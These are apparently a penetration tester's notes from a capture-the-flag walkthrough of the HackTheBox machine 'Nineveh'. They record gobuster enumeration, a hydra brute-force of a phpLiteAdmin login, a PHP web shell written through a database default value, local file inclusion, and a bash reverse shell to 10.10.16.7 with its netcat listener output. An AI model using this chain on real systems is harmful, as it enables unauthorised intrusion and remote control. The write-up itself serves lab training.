3 :443
:80 :443 in parallel
https://nineveh.htb/
just an image loads up
$ gobuster dir -u https://nineveh.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 60 -k
===============================================================
/index.html (Status: 200) [Size: 49]
/db (Status: 301) [Size: 309] [--> https://nineveh.htb/db/]
/secure_notes (Status: 301) [Size: 319] [--> https://nineveh.htb/secure_notes/]
https://nineveh.htb/db/
phpLiteAdmin v1.9 page asking for password
| error on top: Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114
# path is /var/www/ssl/
# default password not working
https://nineveh.htb/secure_notes/
just an image
$ gobuster dir -u https://nineveh.htb/db -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80 -k
===============================================================
/index.php (Status: 200) [Size: 11430]
# have nothing else, brute force using hydra
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb -s 443 https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.:H=Cookie: PHPSESSID=tfmr95s2pe6utd6ga3c8fui8a2"
# got password password123
# logged in
https://nineveh.htb/db/index.php
| no database
Using notes exploit
1. create db kashz.php
2. path: /var/tmp/hack.php
3. create table kashz with 1 field
4. field name: shell | field type: TEXT | default value: <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php&cmd=whoami;id;hostname;uname%20-a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
nineveh
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
# only root has write perms
# calling shell directly with url-encode
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.7/6969%200%3E%261%27
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.43] 46640
bash: cannot set terminal process group (1390): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$
Last updated